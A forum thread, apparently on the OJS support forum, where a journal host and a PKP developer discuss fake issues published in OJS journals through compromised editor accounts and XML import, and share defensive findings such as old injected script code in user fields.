Publishing fake issues in third-party OJS (without hacking into OJS)

Today we received a request for help from a journal we host. They had published a fake issue in their OJS.

We noticed that there are many journals experiencing the same problem. Basically, an issue is published without articles, but with a DOI. Several issues can now be found through this search: Google Search

In the case we investigated, we identified that an attacker had logged in through the account of one of the editors and imported the fake issue from an XML. In other words, it wasn’t a vulnerability being exploited in OJS, but the use of third-party accounts, possibly with leaked or fragile passwords.

Hi @abadan,

Interesting, I hadn’t seen this before. I mentioned on another thread that we have seen reports of privilege escalations via old XSS attacks; have you looked at the journal you host to see if this might’ve been the vector? (Looking through a mysqldump of the database for <script might also give you something to investigate.)

Regards,
Alec Smecher
Public Knowledge Project Team

Complementing the general case with our findings:

We did not identify how they obtained the credentials of legitimate users, but we were able to identify a pattern of similar attempts in this and other journals:

  1. Log in with a regular journal user
  2. They try to access the XML import area
  3. If there is no permission and there is another compromised login in the same OJS, they restart the process.

Now specifically about the case where they succeeded in publishing an issue, and which I reported above, is that it is a journal that came from OJS 2.4.x, so there were more opportunities for exploitation until the upgrade took place. As of OJS 3.3.x we have not identified any vulnerabilities being exploited.

When we migrate an OJS to our hosting, we look for registered users who don’t look legitimate. In the case of this journal, at the time of the upgrade 4 users were deactivated who had JS code in their biography or other field.

In addition, today I found JS code in the abstract of a published article. OJS doesn’t display it and it seems to have been inserted back in the days of OJS 2.4.x.

Thanks for the suggestions, Alec.
We’ll let you know if we make any further progress.

Hi @abadan,

Hmm, I wonder if they aren’t working through some third party username/password database looking for shared credentials, attempting to log in to OJS with them, and when they can, POSTing an XML file to determine whether they’ve got a manager or admin account.

If you see anything more, please let me know (PM if it’s sensitive).

Thanks,
Alec Smecher
Public Knowledge Project Team